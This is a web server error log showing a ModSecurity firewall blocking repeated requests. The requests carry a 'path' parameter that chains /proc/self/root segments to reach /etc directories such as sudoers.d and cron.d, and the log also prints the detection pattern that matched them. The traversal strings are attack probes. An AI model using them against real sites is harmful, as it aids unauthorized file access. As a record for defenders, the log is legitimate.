[Thu Mar 19 05:02:01.411266 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:42182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuteda6ubjKNq_cu4YTegAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:02.543626 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.241.31:35236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutehkFeYa1D6dYQnC_2wAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:02:05.422215 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:42190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutfeyqAr6etmhZHNo04wAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:07.323583 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:42204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutfuyqAr6etmhZHNo05AAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:09.968344 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:55738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutgQkwaGbbGflqUZCG7gAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:02:14.970950 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:42212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuthgkwaGbbGflqUZCG-gAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:16.795267 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.244.43:37076] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abutiAkwaGbbGflqUZCG-wAAAMc"]
[Thu Mar 19 05:02:18.419330 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:52300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutita6ubjKNq_cu4YTlgAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:21.112539 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.243.128:37162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutjRkFeYa1D6dYQnC_6AAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:52.282237 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:37170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutrPu8EFLIOrSqIptv2wAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:55.402167 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:36444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutrwkwaGbbGflqUZCHKwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:56.726021 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:36460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutsPu8EFLIOrSqIptv3AAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:02:59.384416 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:36472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuts-oXxyEfFpUF8f_iGQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:00.687283 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:33156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuttMdf6f5d65gmYZRE0gAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:03.205864 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:33166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuttwbLMZ6AikZjR9Uu6gAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:05.760367 2026] [:error] [pid 19093:tid 140411691570944] [client 74.7.243.128:33172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutuV_V7PWP6ixUYl6NOgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:22.654631 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:45520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet
[Thu Mar 19 05:03:27.694954 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:33184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutzgkwaGbbGflqUZCHTAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:30.131189 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:36720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut0gkwaGbbGflqUZCHUAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:32.524300 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:57528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut1AkwaGbbGflqUZCHVAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:33.796187 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:57544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut1eyqAr6etmhZHNo1AwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:03:34.234324 2026] [mime_magic:error] [pid 19093:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:35654] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/module_tool
[Thu Mar 19 05:03:35.171010 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:57550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abut19a6ubjKNq_cu4YT-AAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
